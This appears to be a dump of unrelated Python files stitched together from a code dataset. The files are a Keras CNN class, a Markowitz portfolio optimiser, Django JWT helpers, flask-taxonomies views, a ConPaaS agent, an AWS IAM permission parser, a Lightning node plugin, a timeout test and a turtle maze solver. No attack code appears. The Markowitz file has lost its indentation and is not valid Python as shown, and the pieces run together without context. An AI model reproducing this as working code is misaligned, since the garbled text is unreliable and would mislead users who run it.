# redaction placeholders from the published dataset; real secrets must not
# live in source -- load them from the environment or a secrets manager.
mail_address = "<EMAIL>"
passplain = "<PASSWORD>"
passtwt = "<PASSWORD>"
passgoog = "<PASSWORD>"
3309203 | <gh_stars>1-10
"""Convolutional Neural Network.
"""
from tensorflow.keras.layers import Conv2D, Dense, Flatten, MaxPool2D
import dualing.utils.logging as l
from dualing.core import Base
# Module-level logger shared by the class below.
logger = l.get_logger(__name__)


class CNN(Base):
    """A CNN class stands for a standard Convolutional Neural Network implementation."""

    def __init__(self, n_blocks=3, init_kernel=5, n_output=128, activation='sigmoid'):
        """Initialization method.

        Args:
            n_blocks (int): Number of convolutional/pooling blocks.
            init_kernel (int): Size of initial kernel.
            n_output (int): Number of output units.
            activation (str): Output activation function.
        """
        logger.info('Overriding class: Base -> CNN.')
        super(CNN, self).__init__(name='cnn')
        # Asserting that it will be possible to create the convolutional
        # layers: each block shrinks the kernel by 2, which must stay >= 1.
        assert init_kernel - 2 * (n_blocks - 1) >= 1
        # Convolutional layers: filters double per block (32, 64, ...) while
        # the kernel size shrinks by 2 per block.
        self.conv = [Conv2D(32 * (2 ** i), init_kernel - 2 * i, activation='relu', padding='same')
                     for i in range(n_blocks)]
        # Pooling layers, one per convolutional block.
        self.pool = [MaxPool2D() for _ in range(n_blocks)]
        # Flatenning layer
        self.flatten = Flatten()
        # Final fully-connected layer
        self.fc = Dense(n_output, activation=activation)
        logger.info('Class overrided.')
        logger.debug('Blocks: %d | Initial Kernel: %d | Output (%s): %d.', n_blocks, init_kernel, activation, n_output)

    def call(self, x):
        """Method that holds vital information whenever this class is called.

        Args:
            x (tf.Tensor): Tensor containing the input sample.

        Returns:
            The layer's outputs.
        """
        # Iterate through convolutional and poooling layers
        for (conv, pool) in zip(self.conv, self.pool):
            # Pass through convolutional layer
            x = conv(x)
            # Pass through pooling layer
            x = pool(x)
        # Flattens the outputs
        x = self.flatten(x)
        # Pass through the fully-connected layer
        x = self.fc(x)
        return x
| StarcoderdataPython |
73087 | <reponame>penguinwang96825/Intelligent-Asset-Allocation<filename>model/markowitz.py<gh_stars>1-10
from database.database import db
from database.tables.price import StockPrice
from tqdm import tqdm
import datetime as dt
import numpy as np
import pandas as pd
import scipy
from pandas_datareader import data
class Markowitz(object):
def __init__(self, selected_tickers):
self.selected_tickers = selected_tickers
def read_stock_file(self, tick):
# Use the Flask-SQLAlchemy to query our data from database
stock_data = StockPrice.find_all_by_query(comp=tick)
date_ = []
high = []
low = []
open_ = []
adj_close = []
vol = []
# Store/Split the data into train & test dataframe
for row in stock_data:
date = dt.datetime.strptime(str(row.date), '%Y-%m-%d')
date_.append(date)
high.append(row.high)
low.append(row.low)
open_.append(row.open_)
adj_close.append(row.adj_close)
vol.append(row.vol)
df = pd.DataFrame({
'date': date_,
'high': high,
'low': low,
'open': open_,
'adj_close': adj_close,
'vol': vol
})
df.set_index('date', inplace=True)
# split dataframe into train & test part
train_df, test_df = df['2012-01-01': '2016-12-31'], df['2017-01-01': '2020-06-30']
self.test_df = test_df
return train_df, test_df
def prepare_input(self):
# 1. Collect user selected tickers' stock price
all_data_df = pd.DataFrame({})
time_step = 180
for ticker in self.selected_tickers:
train_df, test_df = self.read_stock_file(ticker)
# axis=0 -> combine vertically
dataset_total = pd.concat([train_df, test_df], axis=0)
inputs = dataset_total[len(dataset_total)-len(test_df)-time_step:]['adj_close']
all_data_df[ticker] = inputs
# 2. Prepare main markowitz inputs
# 2-1. price_df -> price_list
prices_list = []
for i in range(time_step, len(all_data_df)):
price_t = all_data_df[i-time_step:i].T
prices_list.append(price_t)
# 2-2. get market capitalization
end = dt.datetime(2016, 12, 31)
market_caps = list(data.get_quote_yahoo(self.selected_tickers, end)['marketCap'])
return prices_list, market_caps
def assets_historical_returns_covariances(self, prices_list):
all_exp_returns = []
all_covars = []
for prices in prices_list:
prices = np.array(prices)
rows, cols = prices.shape
returns = np.empty([rows, cols - 1])
for r in range(rows):
for c in range(cols-1):
p0, p1 = prices[r, c], prices[r, c+1]
returns[r, c] = (p1/p0) - 1
# calculate returns
exp_returns = np.array([])
for r in range(rows):
exp_returns = np.append(exp_returns, np.mean(returns[r]))
# calculate covariances
covars = np.cov(returns)
# annualize returns, covariances
exp_returns = (1 + exp_returns) ** (365.25) - 1
covars = covars * (365.25)
all_exp_returns.append(exp_returns)
all_covars.append(covars)
return all_exp_returns, all_covars
def portfolioMean(self, W, R):
return sum(R * W)
def portfolioVar(self, W, C):
return np.dot(np.dot(W, C), W)
def portfolioMeanVar(self, W, R, C):
return self.portfolioMean(W, R), self.portfolioVar(W, C)
def solve_weights(self, R, C, rf):
def fitness(W, R, C, rf):
mean, var = self.portfolioMeanVar(W, R, C)
sharp_ratio = (mean - rf) / np.sqrt(var) # sharp ratio
return 1 / sharp_ratio
n = len(R)
W = np.ones([n]) / n
b_ = [(0., 1.) for i in range(n)]
c_ = ({'type': 'eq', 'fun': lambda W: sum(W) - 1.})
optimized = scipy.optimize.minimize(fitness, W, (R, C, rf), method='SLSQP', constraints=c_, bounds=b_)
return optimized.x
def get_all_weights(self):
    """Solve Markowitz weights for every rolling price window.

    Side effect: stores the raw weight vectors on ``self.weights``.
    Returns the weights transposed to per-asset lists, expressed as
    percentages rounded to 2 decimals and clipped to [0, 100].
    """
    prices_list, _ = self.prepare_input()
    all_R, all_C = self.assets_historical_returns_covariances(prices_list)
    all_weights = []
    length = len(all_R)
    rf = 0.015  # assumed annual risk-free rate -- TODO confirm
    for i in tqdm(range(length)):
        weight = list(self.solve_weights(all_R[i], all_C[i], rf))
        all_weights.append(weight)
    self.weights = all_weights
    # Percentages for presentation; clip guards the optimizer's tiny
    # numerical over/undershoot outside [0, 1].
    weights = np.clip(np.around(np.array(all_weights) * 100, 2), 0, 100)
    transposed_weights = weights.transpose().tolist()
    return transposed_weights
def get_backtest_result(self):
    """Backtest the solved weights over the test period.

    Returns (dates, cumulative portfolio values, per-ticker price lists).
    Assumes ``get_all_weights`` ran first (reads ``self.weights``) and
    that ``self.test_df`` holds a date-indexed test frame -- TODO confirm
    where ``self.test_df`` is assigned.
    """
    # get testing section stock price data
    log_return_df = pd.DataFrame({})
    prices_dict = {}
    for ticker in self.selected_tickers:
        _, test_df = self.read_stock_file(ticker)
        # add log return col for calculate the performance
        price = test_df['adj_close']
        prices_dict[ticker] = price.values.tolist()
        log_return = np.log(price) - np.log(price.shift(1))
        log_return_df = pd.concat([log_return_df, log_return], axis=1)
    # First row is NaN (no previous price to diff against), so drop it.
    log_return_df = log_return_df.iloc[1:, :]
    log_return_df.columns = self.selected_tickers
    # calculate the whole portfolio performance
    length = len(log_return_df)
    total_value = 1
    all_values = []
    all_return = []
    for i in range(length):
        portfolio_weights = self.weights[i]
        returns = log_return_df.iloc[i, :].values
        # NOTE(review): these are log returns, so compounding with
        # (1 + r) is an approximation -- confirm intended.
        portfolio_return = sum(portfolio_weights * returns)
        total_value = total_value * (1+portfolio_return)
        all_values.append(total_value)
        all_return.append(portfolio_return)
    date = self.test_df.reset_index()['date']
    date = date.dt.strftime('%Y-%m-%d')
    # Skip the first date to align with the dropped NaN return row.
    date = date.values[1:]
    return date, all_values, prices_dict
94746 | <gh_stars>1-10
import datetime
# Django imports
from django.contrib.auth.models import Group
from rest_framework import permissions
# Local imports
from config.settings import JWT_AUTH
# Create your views here.
def jwt_payload_handler(user):
    """Defines payload to be stored in JWT passed to the client.

    Includes the user's id, email, username, group names, and an expiry
    timestamp derived from JWT_AUTH['JWT_EXPIRATION_DELTA'].
    """
    group_names = list(user.groups.all().values_list('name', flat=True))
    expiry = datetime.datetime.utcnow() + JWT_AUTH['JWT_EXPIRATION_DELTA']
    payload = {
        'user_id': user.id,
        'email': user.email,
        'username': user.get_username(),
        'groups': group_names,
        'exp': expiry,
    }
    return payload
def is_in_group(user, group_name):
    """Takes a user and a group name, and returns `True` if the user is
    in that group.

    Raises Group.DoesNotExist if no group with that name exists.
    """
    group = Group.objects.get(name=group_name)
    membership = group.user_set.filter(id=user.id)
    return membership.exists()
class HasGroupPermission(permissions.BasePermission):
    """Ensure user is in required groups.

    Views declare ``required_groups = {"GET": [...], "POST": [...]}``;
    a request is allowed only if the user belongs to every group listed
    for its HTTP method.
    """

    def has_permission(self, request, view):
        # Mapping of HTTP method -> list of required group names.
        groups_by_method = getattr(view, 'required_groups', {})
        # Groups required for this particular request method.
        required = groups_by_method.get(request.method, [])
        # The full list is built first (every membership is checked),
        # matching the original non-short-circuiting behaviour.
        checks = [is_in_group(request.user, name) for name in required]
        return all(checks)
| StarcoderdataPython |
import sqlalchemy
from flask_taxonomies.constants import INCLUDE_DELETED, INCLUDE_DESCENDANTS, \
INCLUDE_DESCENDANTS_COUNT, INCLUDE_STATUS, INCLUDE_SELF
from flask_taxonomies.models import TaxonomyTerm, TermStatusEnum, Representation
from flask_taxonomies.proxies import current_flask_taxonomies
from flask_taxonomies.term_identification import TermIdentification
from flask_taxonomies.views.common import build_descendants
from flask_taxonomies.views.paginator import Paginator
from flask import current_app
def get_taxonomy_json(code=None,
                      slug=None,
                      prefer: Representation = Representation("taxonomy"),
                      page=None,
                      size=None,
                      status_code=200,
                      q=None,
                      request=None):
    """Build a Paginator over the JSON representation of taxonomy terms.

    :param code: taxonomy code to look up
    :param slug: term slug within the taxonomy (None for the whole tree)
    :param prefer: representation preferences, merged with the taxonomy's own
    :param page: page number; only honoured when descendants are included
    :param size: page size; only honoured when descendants are included
    :param status_code: unused here -- NOTE(review): confirm callers need it
    :param q: optional term query string
    :param request: when given, term read permission is enforced against it
    """
    taxonomy = current_flask_taxonomies.get_taxonomy(code)
    prefer = taxonomy.merge_select(prefer)
    if request:
        current_flask_taxonomies.permissions.taxonomy_term_read.enforce(request=request,
                                                                        taxonomy=taxonomy,
                                                                        slug=slug)
    # Deleted terms are only visible when explicitly requested.
    if INCLUDE_DELETED in prefer:
        status_cond = sqlalchemy.sql.true()
    else:
        status_cond = TaxonomyTerm.status == TermStatusEnum.alive
    return_descendants = INCLUDE_DESCENDANTS in prefer
    if return_descendants:
        query = current_flask_taxonomies.descendants_or_self(
            TermIdentification(taxonomy=code, slug=slug),
            levels=prefer.options.get('levels', None),
            status_cond=status_cond,
            return_descendants_count=INCLUDE_DESCENDANTS_COUNT in prefer,
            return_descendants_busy_count=INCLUDE_STATUS in prefer
        )
    else:
        query = current_flask_taxonomies.filter_term(
            TermIdentification(taxonomy=code, slug=slug),
            status_cond=status_cond,
            return_descendants_count=INCLUDE_DESCENDANTS_COUNT in prefer,
            return_descendants_busy_count=INCLUDE_STATUS in prefer
        )
    if q:
        query = current_flask_taxonomies.apply_term_query(query, q, code)
    # Pagination only applies to descendant listings; a single term is
    # returned unpaginated.
    paginator = Paginator(
        prefer,
        query, page if return_descendants else None,
        size if return_descendants else None,
        json_converter=lambda data:
        build_descendants(data, prefer, root_slug=None),
        allow_empty=INCLUDE_SELF not in prefer, single_result=INCLUDE_SELF in prefer,
        has_query=q is not None
    )
    return paginator
def taxonomy_term_to_json(term):
    """
    Converts taxonomy term to default JSON. Use only if the term
    has ancestors pre-populated, otherwise it is not an efficient
    implementation - use the one from API instead.
    :param term: term to serialize
    :return: array of json terms
    """
    serialized = []
    node = term
    # Walk from the term up through its ancestors.
    while node:
        entry = dict(node.extra_data or {})
        entry['slug'] = node.slug
        entry['level'] = node.level + 1
        if node.obsoleted_by_id:
            entry['obsoleted_by'] = node.obsoleted_by.slug
        entry['links'] = {
            'self': ('https://'
                     + current_app.config['SERVER_NAME']
                     + current_app.config['FLASK_TAXONOMIES_URL_PREFIX']
                     + node.slug)
        }
        serialized.append(entry)
        node = node.parent
    return serialized
| StarcoderdataPython |
"""
Copyright (c) 2010-2013, Contrail consortium.
All rights reserved.
Redistribution and use in source and binary forms,
with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the
above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce
the above copyright notice, this list of
conditions and the following disclaimer in the
documentation and/or other materials provided
with the distribution.
3. Neither the name of the Contrail consortium nor the
names of its contributors may be used to endorse
or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
from subprocess import Popen
from conpaas.core.expose import expose
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.core.agent import BaseAgent
class BluePrintAgent(BaseAgent):
    """Agent class with the following exposed methods:

    check_agent_process() -- GET
    create_node(my_ip, hub_ip) -- POST
    test() -- GET
    """
    def __init__(self, config_parser, **kwargs):
        """Initialize BluePrint Agent.

        'config_parser' represents the agent config file.
        **kwargs holds anything that can't be sent in config_parser.
        """
        BaseAgent.__init__(self, config_parser)

    @expose('POST')
    def create_node(self, kwargs):
        """Agent startup hook: record our own IP and flip state to RUNNING.

        NOTE(review): 'hub_ip' is not read here despite the class-level
        description -- confirm whether it is still required.
        """
        self.logger.info('Node starting up')
        self.state = 'ADAPTING'
        self.my_ip_address = kwargs['my_ip']
        #Do something on agent startup
        self.state = 'RUNNING'
        self.logger.info('Node started up')
        return HttpJsonResponse()

    @expose('GET')
    def test(self, kwargs):
        """Trivial liveness check returning a fixed message."""
        self.logger.info('Test method started')
        self.state = 'ADAPTING'
        msg = "hello kitty"
        self.state = 'RUNNING'
        self.logger.info('Test method ended')
        return HttpJsonResponse({'msg': msg})
| StarcoderdataPython |
import re
# Patterns mapping "admin-like" action permissions to a human-readable label.
PRIVILEGED_STATEMENT_RULES = {
    "\*:\*": "Full AWS Account Admin",
    "^[A-Za-z0-9]+:\*$": "Full {service} Admin"
}
# Extracts the service prefix of an action, e.g. "s3" from "s3:GetObject".
FIND_SERVICE_REGEX = "^([A-Za-z0-9]+)(?=:)"
# Matches an ARN belonging to a given service (optionally the aws-cn partition).
RESOURCE_ARN_WITH_SERVICE_REGEX = "^arn:aws(-cn|):{service}:.+"


class PoliciesPermissionsParser(object):
    """Aggregate IAM policy statements into effective permissions.

    ``policies`` maps a policy identifier to a list of statement objects
    exposing ``effect`` ("Allow"/"Deny"), ``actions`` and ``resources``.
    Call :meth:`parse` before querying permissions.
    """

    def __init__(self, policies):
        self.__policies = policies
        # resource -> set of effectively allowed actions (filled by parse()).
        self.__permissions = {}
        # resource -> list of denied actions.
        self.__disallowed_permissions = {}
        # resource -> list of allowed actions (before deny filtering).
        self.__allowed_permissions = {}

    @staticmethod
    def __push_resource_permission(permissions_dict, statement):
        """Record each (resource, action) pair of *statement*.

        Only resources equal to "*" or an ARN of the action's service count.
        """
        resources = statement.resources
        for action in statement.actions:
            action_service = re.findall(FIND_SERVICE_REGEX, action)
            if len(action_service) > 0:
                for resource in resources:
                    is_arn_service_resource = re.match(
                        RESOURCE_ARN_WITH_SERVICE_REGEX.format(service=action_service[0]),
                        resource)
                    if is_arn_service_resource or resource == "*":
                        if resource not in permissions_dict:
                            permissions_dict[resource] = []
                        permissions_dict[resource].append(action)

    def is_action_disallowed(self, deny_statement_rules, action_permission_rule):
        """Return True if *action_permission_rule* is denied.

        NOTE(review): deny entries collected by parse() are keyed by
        resource, but this lookup treats the keys as service names --
        confirm which keying is intended.
        """
        action_service_matches = re.findall(FIND_SERVICE_REGEX, action_permission_rule)
        if len(action_service_matches) > 0:
            action_service = action_service_matches[0]
            # Not matching permissions like ec2:list* - It doesn't support
            if action_service in deny_statement_rules and (
                    action_permission_rule in deny_statement_rules[action_service]
                    or action_service + ":*" in deny_statement_rules[action_service]):
                return True
        return False

    def is_permission_allowed(self, permissions_name, permission_resource=None):
        """Return True if any of *permissions_name* is effectively allowed.

        Accepts a single action string or a list of actions; when
        *permission_resource* is None, all resources are searched.
        """
        if isinstance(permissions_name, str):
            # Fixed: was ``permissions_name is str``, which is never true,
            # so a plain string argument iterated character by character.
            permissions_name = [permissions_name]
        if permission_resource is None:
            for permission_resource in self.__permissions.keys():
                for permission_name in permissions_name:
                    if permission_name in self.__permissions[permission_resource]:
                        return True
        else:
            if permission_resource in self.__permissions:
                for permission_name in permissions_name:
                    if permission_name in self.__permissions[permission_resource]:
                        return True
        return False

    def parse(self):
        """Collect Allow/Deny statements, then compute effective permissions."""
        for policy_arn, attached_policy_statement in self.__policies.items():
            for statement in attached_policy_statement:
                if statement.effect == "Deny":
                    self.__push_resource_permission(self.__disallowed_permissions, statement)
                elif statement.effect == "Allow":
                    # Parse the statement's permissions and resources.
                    self.__push_resource_permission(self.__allowed_permissions, statement)
        # Effective permissions = allowed actions not matched by a deny rule.
        for resource, actions in self.__allowed_permissions.items():
            for action in actions:
                if not self.is_action_disallowed(self.__disallowed_permissions, action):
                    if resource in self.__permissions:
                        self.__permissions[resource].add(action)
                    else:
                        self.__permissions[resource] = set()
                        self.__permissions[resource].add(action)

    def __statement_policy_privilege_parser(self, action_permission):
        """Return a label for any high-privilege pattern matched by
        *action_permission*, or an empty string if none matches.
        """
        action_permission_overview = ""
        for rule in PRIVILEGED_STATEMENT_RULES:
            if re.search(rule, action_permission):
                service = re.findall(FIND_SERVICE_REGEX, action_permission)
                if len(service) > 0:
                    action_permission_overview = PRIVILEGED_STATEMENT_RULES[rule].format(service=service[0])
                else:
                    action_permission_overview = PRIVILEGED_STATEMENT_RULES[rule].format(service=action_permission)
                break
        return action_permission_overview

    def get_detailed_permissions_status(self):
        """Return a multi-line report of allowed and denied permissions."""
        permissions_status = ""
        if 0 < len(self.__permissions.keys()):
            permissions_status += "Allowed permissions\r\n"
            for resource in self.__permissions.keys():
                permissions_status += "  {resource}:\r\n".format(resource=resource)
                for action_permission in self.__permissions[resource]:
                    permissions_status += "    {action_permission}\n".format(action_permission=action_permission)
        if 0 < len(self.__disallowed_permissions):
            permissions_status += "Disallowed permissions:\r\n"
            for resource in self.__disallowed_permissions:
                permissions_status += "  {resource}:\r\n".format(resource=resource)
                for permission in self.__disallowed_permissions[resource]:
                    permissions_status += "    {permission}\n".format(permission=permission)
        return permissions_status

    def get_permissions_status(self):
        """Return a comma-separated summary of high-privilege permissions."""
        permissions_status = set()
        for resource in self.__permissions.keys():
            for action_permission in self.__permissions[resource]:
                policy_privilege_parser = self.__statement_policy_privilege_parser(action_permission)
                if policy_privilege_parser != "":
                    permissions_status.add(policy_privilege_parser)
        return ", ".join(permissions_status)
156004 | <reponame>adi2011/plugins
#! /usr/bin/python3
import py_compile
from pyln.client import Plugin
import pyqrcode
from requests import get
plugin = Plugin()
def getChannel(peerid, chanid):
    """Look up a peer and the channel *chanid* on it.

    Returns a (peer, channel) tuple.
    NOTE(review): ``peer["channels"]`` is indexed with a string key --
    confirm the listpeers result shape this expects.
    """
    peer = plugin.rpc.listpeers(peerid)
    assert peer, "cannot find peer"
    chan = peer["channels"]
    assert chan["channel_id"]==chanid, "cannot find channel"
    # Fixed: originally returned the set {peer, chan}; dicts are
    # unhashable, so that always raised TypeError. Callers unpack two
    # values, so return a tuple.
    return peer, chan
@plugin.method("enable-spark")
def enable_spark(port = 9735):
    """Generate an lnlink URI (node id @ public ip:port + commando rune),
    display it as a QR code, and return it."""
    token = plugin.rpc.call("commando-rune")
    node_id = plugin.rpc.getinfo()["id"]
    # The node's public IP is discovered via an external web service,
    # so this requires outbound internet access.
    addr = get('https://api.ipify.org').content.decode('utf8')+":"+str(port)
    res = "lnlink:" + node_id + '@' + addr + '?' + 'token=' + token["rune"]
    qr = pyqrcode.create(res, encoding="ascii")
    qr.show()
    return res
@plugin.method("_listpays")
def listpays():
    """Proxy for the node's ``listpays`` RPC."""
    plugin.log("listpays")
    result = plugin.rpc.listpays()
    return result
#-----FOLLOWING ARE NOT NEEDED??----
# @plugin.method("spark-listpeers")
# def spark_listpeers():
# plugin.log("listpeers")
# return plugin.rpc.listpeers()
# @plugin.method("spark-getinfo")
# def spark_getinfo():
# plugin.log("getinfo")
# return plugin.rpc.getinfo()
# @plugin.method("spark-offer")
# def spark_offer(amount, discription):
# plugin.log("offer")
# return plugin.rpc.offer(amount, discription)
# @plugin.method("spark-listfunds")
# def spark_listfunds():
# plugin.log("listfunds")
# return plugin.rpc.listfunds()
# @plugin.method("spark-invoice")
# def spark_invoice(amt, label, disc):
# plugin.log("invoice")
# return plugin.rpc.invoice(amt, label, disc)
# @plugin.method("spark-newaddr")
# def spark_invoice():
# plugin.log("newaddr")
# return plugin.rpc.newaddr()
# @plugin.method("spark-getlog")
# def spark_invoice():
# plugin.log("getlog")
# return plugin.rpc.getlog()
# --------------------
@plugin.method("_listconfigs")
def listconfigs():
    """Proxy for the node's ``listconfigs`` RPC."""
    plugin.log("listconfigs")
    configs = plugin.rpc.listconfigs()
    return configs
@plugin.method("_listinvoices")
def listinvoices(plugin):
    """Return only the paid invoices from the node's ``listinvoices`` RPC.

    Renamed from ``listconfigs``: the original name shadowed the
    ``_listconfigs`` handler defined above at module level. The RPC name
    exposed to clients comes from the decorator and is unchanged.
    """
    plugin.log("listinvoices")
    invoices = plugin.rpc.listinvoices()["invoices"]
    return [inv for inv in invoices if inv["status"] == "paid"]
@plugin.method("_pay")
def pay(paystr, *args):
    """Proxy for the node's ``pay`` RPC.

    NOTE(review): extra positional args are forwarded as a single tuple
    (``plugin.rpc.pay(paystr, args)``), not unpacked -- confirm intended.
    """
    pay_res = plugin.rpc.pay(paystr, args)
    return pay_res
@plugin.method("_decodecheck")
def decodecheck(paystr):
    """Decode *paystr* and reject unsupported bolt12 offer features.

    Offers with recurrence, quantity without an amount, or the
    send_invoice variants listed below are rejected via assert.
    """
    plugin.log("decodecheck")
    s = plugin.rpc.decode(paystr)
    if(s["type"]=="bolt12 offer"):
        # Fixed: the assert previously required "recurrence" to be
        # PRESENT, contradicting its own error message.
        assert "recurrence" not in s.keys(), "Offers with recurrence are unsupported"
        # NOTE(review): "quantity_min" here vs "min_quantity" below --
        # confirm which field name the decode result actually uses.
        assert s["quantity_min"] == None or s["msatoshi"] or s["amount"], 'Offers with quantity but no payment amount are unsupported'
        assert not s["send_invoice"] or s["msatoshi"], "send_invoice offers with no amount are unsupported"
        assert not s["send_invoice"] or s["min_quantity"] == None, 'send_invoice offers with quantity are unsupported'
    return s
@plugin.method("_connectfund")
def connectfund(peeruri, satoshi, feerate):
    """Connect to *peeruri* (``id@host:port``) and fund a channel.

    NOTE(review): only the node id is passed to ``connect``; this works
    only if the node already knows the peer's address -- confirm.
    """
    peerid = peeruri.split('@')[0]
    plugin.rpc.connect(peerid)
    res = plugin.rpc.fundchannel(peerid, satoshi, feerate)
    assert (res and res["channel_id"]), "cannot open channel"
    return getChannel(peerid, res["channel_id"])
@plugin.method("_close")
def close(peerid, chainid, force, timeout):
    """Close the channel with *peerid* and return (peer, channel, result).

    Fixed: the decorator was written without '@', so the handler was
    never registered with the plugin; and the return was a set of
    unhashable dicts (always TypeError) -- now a tuple.
    NOTE(review): ``chainid`` and ``force`` are accepted but unused --
    confirm whether they should be forwarded to ``rpc.close``.
    """
    res = plugin.rpc.close(peerid, timeout)
    assert res and res["txid"], "Cannot close channel"
    peer, chan = getChannel(peerid, res["channel_id"])
    return peer, chan, res
@plugin.init()
def init(options, configuration, plugin):
    """Plugin startup hook: just log that we are ready."""
    plugin.log("Plugin spark-commando initialized")
plugin.run() | StarcoderdataPython |
3361704 | <gh_stars>0
import unittest
import sys
import os
from os import system
from time import time
from pathlib import Path
from unittest.mock import patch
from self import test_self_compilation
from lib.runner import execute, TimeoutException, set_home_path
from tests.utils import CaptureOutput, for_all_test_results
class TestExecutionTimeout(unittest.TestCase):
    """Tests that runner.execute enforces its timeout and that timed-out
    grader tests are reported as failures."""

    def setUp(self):
        # The tests expect to run from the repository root, one level up.
        os.chdir('..')

    def tearDown(self):
        os.chdir('grader')

    @classmethod
    def setUpClass(self):
        # Build selfie once for the whole class (output suppressed).
        # NOTE(review): the classmethod parameter is conventionally
        # named ``cls`` -- works either way.
        system('cd .. && make selfie >/dev/null 2>&1')

    def test_timeout(self):
        start = time()
        # A 3-second timeout on a program that sleeps forever must raise...
        self.assertRaises(TimeoutException, execute,
                          './selfie -c grader/tests/sleep-forever.c -m 10', 3)
        # ...and must do so promptly (well under 4 s wall clock).
        self.assertLess(time() - start, 4)

    def execute_mock(self, command, timeout=10):
        # Force an immediate timeout regardless of the requested one.
        return execute(command, timeout=0)

    def check_output(self, result, msg):
        # Every test result must be a failure when execution times out.
        self.assertFalse(result)

    @patch('lib.runner.execute')
    def test_result_of_timed_out_test(self, mock):
        mock.side_effect = self.execute_mock
        set_home_path(Path('..'))
        with CaptureOutput() as capture:
            test_self_compilation()
        output = capture.get_output()
        for_all_test_results(output, self.check_output)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1775162 | <reponame>Ostap2003/backtracking-team-project<gh_stars>0
import turtle
from stack import Stack
from pprint import pprint
class PathFinder:
    """Find path in a maze via depth-first backtracking, optionally
    animating the search with turtle graphics."""
    # Cell markers used inside the maze grid.
    PATH = "o"   # cell on the current candidate path
    WALL = "*"   # impassable cell
    USED = "-"   # cell visited and backtracked from

    def __init__(self, start: tuple, finish: tuple, maze=None, path=None, draw_maze=False):
        # (row, col) coordinates of the entrance and the exit.
        self.start_pos = start
        self.exit = finish
        self.draw_maze = draw_maze
        if maze:
            self.maze = maze
            self.maze_rows = len(maze)
            self.maze_cols = (len(maze[0]))
        else:
            # Dimensions are filled in by read_maze().
            self.maze_rows = 0
            self.maze_cols = 0
            self.maze = self.read_maze(path)
        if self.draw_maze:
            self.my_pen = turtle.Turtle()
            self.my_pen._tracer(0)
            self.my_pen.speed(1)
            self.my_pen.hideturtle()

    def read_maze(self, path):
        """Reads file with maze, and trasforms it into a list of lists"""
        maze = []
        with open(path, 'r', encoding='utf-8') as maze_fl:
            for line in maze_fl:
                self.maze_rows += 1
                line = line.strip()
                row = []
                for el in line:
                    row.append(el)
                maze.append(row)
        # Column count is taken from the first row; rows are assumed equal
        # length -- TODO confirm for ragged maze files.
        self.maze_cols = len(maze[0])
        return maze

    def find_path(self):
        """Find a route that connects entrance to the maze
        with the exit, if there is exit.
        Makes moves in the following order:
        up, right, left, down"""
        moves_stack = Stack()
        current_pos = self.start_pos
        moves_stack.add(current_pos)
        self.set_cell(current_pos, self.PATH)
        # Row/column deltas tried in order: up, right, left, down.
        possible_routes = [(-1, 0), (0, 1), (0, -1), (1, 0)]
        # NOTE(review): if the maze has no reachable exit, this loop
        # eventually empties the stack and does not terminate cleanly --
        # confirm intended behaviour.
        while (not self._exit_found(current_pos)):
            next_move_found = False
            for move in possible_routes:
                if self._valid_move(current_pos, move):
                    current_pos = current_pos[0] + move[0], current_pos[1] + move[1]
                    self.set_cell(current_pos, self.PATH)
                    moves_stack.add(current_pos)
                    next_move_found = True
                    # draw here a cell with turtle
                    if self.draw_maze:
                        self.my_pen.clear()
                        self.build_maze()
                        self.my_pen.getscreen().update()
                    break
            if not next_move_found:
                # Dead end: backtrack one step and mark the cell as used.
                moves_stack.pop_el_from_stack()
                self.set_cell(current_pos, self.USED)
                # mark curr cell with grey col
                if self.draw_maze:
                    self.my_pen.clear()
                    self.build_maze()
                    self.my_pen.getscreen().update()
                current_pos = moves_stack.peek()
        if self.draw_maze:
            self.my_pen.getscreen().update()
            turtle.done()

    def _exit_found(self, current_pos):
        """Check if current position equals to the exit position"""
        return self.exit == current_pos

    def _valid_move(self, current_pos, move):
        """Check if move is valid: inside the board and on a free cell."""
        possible_mv = current_pos[0] + move[0], current_pos[1] + move[1]
        # check if possible move is in board range
        if possible_mv[0] in range(0, self.maze_rows) and\
           possible_mv[1] in range(0, self.maze_cols):
            cell_val = self.get_cell(possible_mv)
            if cell_val == " ":
                return True
        return False

    def get_cell(self, position):
        """Return value that belongs to the cell"""
        return self.maze[position[0]][position[1]]

    def set_cell(self, position: tuple, value: str):
        """Set a value for cell on the given position"""
        self.maze[position[0]][position[1]] = value

    def __str__(self):
        """String representation of the maze"""
        maze = ""
        for row in self.maze:
            for el in row:
                maze += el
            maze += "\n"
        return maze.strip()

    def box(self, side):
        """Builds a box, an element of the maze that can be a wall, path, or unvisited cell"""
        self.my_pen.begin_fill()
        # Three (forward, turn) pairs plus the final forward draw a square.
        for _ in range(3):
            self.my_pen.forward(side)
            self.my_pen.left(90)
        self.my_pen.forward(side)
        self.my_pen.end_fill()
        self.my_pen.setheading(0)

    def build_maze(self):
        """Builds a whole maze using box func as a helper"""
        side = 30
        self.my_pen.penup()
        self.my_pen.goto(-130,130)
        self.my_pen.setheading(0)
        for row in self.maze:
            for col in row:
                # Colour by cell type: wall, path, backtracked, free.
                if col == "*":
                    self.my_pen.color("#000000")
                elif col == "o":
                    self.my_pen.color("#4fff98")
                elif col == "-":
                    self.my_pen.color("#ff7e4f")
                else:
                    self.my_pen.color("#FFFFFF")
                self.box(side)
                self.my_pen.penup()
                self.my_pen.forward(side)
